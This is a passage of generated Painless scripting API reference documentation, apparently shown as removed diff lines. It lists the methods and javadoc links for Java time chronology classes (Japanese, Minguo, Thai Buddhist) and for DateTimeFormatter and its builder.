{java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-JapaneseEra]] -==== JapaneseEra -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#HEISEI[HEISEI] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#MEIJI[MEIJI] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#SHOWA[SHOWA] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#TAISHO[TAISHO] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#of(int)[of](int) -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#valueOf(java.lang.String)[valueOf](null) -* static JapaneseEra[] {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MinguoChronology]] -==== MinguoChronology -* static MinguoChronology {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(int,int,int)[date](int, int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateEpochDay(long)[dateEpochDay](long) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-MinguoDate]] -==== MinguoDate -* static MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* MinguoChronology {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#getChronology()[getChronology]() -* MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-MinguoEra]] -==== MinguoEra -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#BEFORE_ROC[BEFORE_ROC] -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#ROC[ROC] -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#of(int)[of](int) -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#valueOf(java.lang.String)[valueOf](null) -* static MinguoEra[] {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ThaiBuddhistChronology]] -==== ThaiBuddhistChronology -* static ThaiBuddhistChronology {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(int,int,int)[date](int, int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateEpochDay(long)[dateEpochDay](long) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-ThaiBuddhistDate]] -==== ThaiBuddhistDate -* static ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* ThaiBuddhistChronology {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#getChronology()[getChronology]() -* ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-ThaiBuddhistEra]] -==== ThaiBuddhistEra -* static ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#BE[BE] -* static ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#BEFORE_BE[BEFORE_BE] -* static ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#of(int)[of](int) -* static ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#valueOf(java.lang.String)[valueOf](null) -* static ThaiBuddhistEra[] {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-time-format"] -=== Shared API for package java.time.format -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-DateTimeFormatter]] -==== DateTimeFormatter -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#BASIC_ISO_DATE[BASIC_ISO_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_DATE[ISO_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_DATE_TIME[ISO_DATE_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_INSTANT[ISO_INSTANT] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_LOCAL_DATE[ISO_LOCAL_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_LOCAL_DATE_TIME[ISO_LOCAL_DATE_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_LOCAL_TIME[ISO_LOCAL_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_OFFSET_DATE[ISO_OFFSET_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_OFFSET_DATE_TIME[ISO_OFFSET_DATE_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_OFFSET_TIME[ISO_OFFSET_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_ORDINAL_DATE[ISO_ORDINAL_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_TIME[ISO_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_WEEK_DATE[ISO_WEEK_DATE] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ISO_ZONED_DATE_TIME[ISO_ZONED_DATE_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#RFC_1123_DATE_TIME[RFC_1123_DATE_TIME] -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofLocalizedDate(java.time.format.FormatStyle)[ofLocalizedDate](FormatStyle) -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofLocalizedDateTime(java.time.format.FormatStyle)[ofLocalizedDateTime](FormatStyle) -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofLocalizedDateTime(java.time.format.FormatStyle,java.time.format.FormatStyle)[ofLocalizedDateTime](FormatStyle, FormatStyle) -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofLocalizedTime(java.time.format.FormatStyle)[ofLocalizedTime](FormatStyle) -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofPattern(java.lang.String)[ofPattern](null) -* static DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#ofPattern(java.lang.String,java.util.Locale)[ofPattern](null, Locale) -* static TemporalQuery {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parsedExcessDays()[parsedExcessDays]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parsedLeapSecond()[parsedLeapSecond]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#format(java.time.temporal.TemporalAccessor)[format](TemporalAccessor) -* void {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#formatTo(java.time.temporal.TemporalAccessor,java.lang.Appendable)[formatTo](TemporalAccessor, Appendable) -* Chronology {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getChronology()[getChronology]() -* DecimalStyle {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getDecimalStyle()[getDecimalStyle]() -* Locale {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getLocale()[getLocale]() -* Set {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getResolverFields()[getResolverFields]() -* ResolverStyle {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getResolverStyle()[getResolverStyle]() -* ZoneId {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* TemporalAccessor {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parse(java.lang.CharSequence)[parse](CharSequence) -* def {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parse(java.lang.CharSequence,java.time.temporal.TemporalQuery)[parse](CharSequence, TemporalQuery) -* TemporalAccessor {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parseBest(java.lang.CharSequence,java.time.temporal.TemporalQuery%5B%5D)[parseBest](CharSequence, TemporalQuery[]) -* TemporalAccessor {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#parseUnresolved(java.lang.CharSequence,java.text.ParsePosition)[parseUnresolved](CharSequence, ParsePosition) -* Format {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#toFormat()[toFormat]() -* Format {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#toFormat(java.time.temporal.TemporalQuery)[toFormat](TemporalQuery) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withChronology(java.time.chrono.Chronology)[withChronology](Chronology) -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withDecimalStyle(java.time.format.DecimalStyle)[withDecimalStyle](DecimalStyle) -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withLocale(java.util.Locale)[withLocale](Locale) -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withResolverFields(java.util.Set)[withResolverFields](Set) -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withResolverStyle(java.time.format.ResolverStyle)[withResolverStyle](ResolverStyle) -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html#withZone(java.time.ZoneId)[withZone](ZoneId) - - -[[painless-api-reference-shared-DateTimeFormatterBuilder]] -==== DateTimeFormatterBuilder -* static null {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#getLocalizedDateTimePattern(java.time.format.FormatStyle,java.time.format.FormatStyle,java.time.chrono.Chronology,java.util.Locale)[getLocalizedDateTimePattern](FormatStyle, FormatStyle, Chronology, Locale) -* {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#()[DateTimeFormatterBuilder]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#append(java.time.format.DateTimeFormatter)[append](DateTimeFormatter) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendChronologyId()[appendChronologyId]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendChronologyText(java.time.format.TextStyle)[appendChronologyText](TextStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendFraction(java.time.temporal.TemporalField,int,int,boolean)[appendFraction](TemporalField, int, int, boolean) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendInstant()[appendInstant]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendInstant(int)[appendInstant](int) -* DateTimeFormatterBuilder 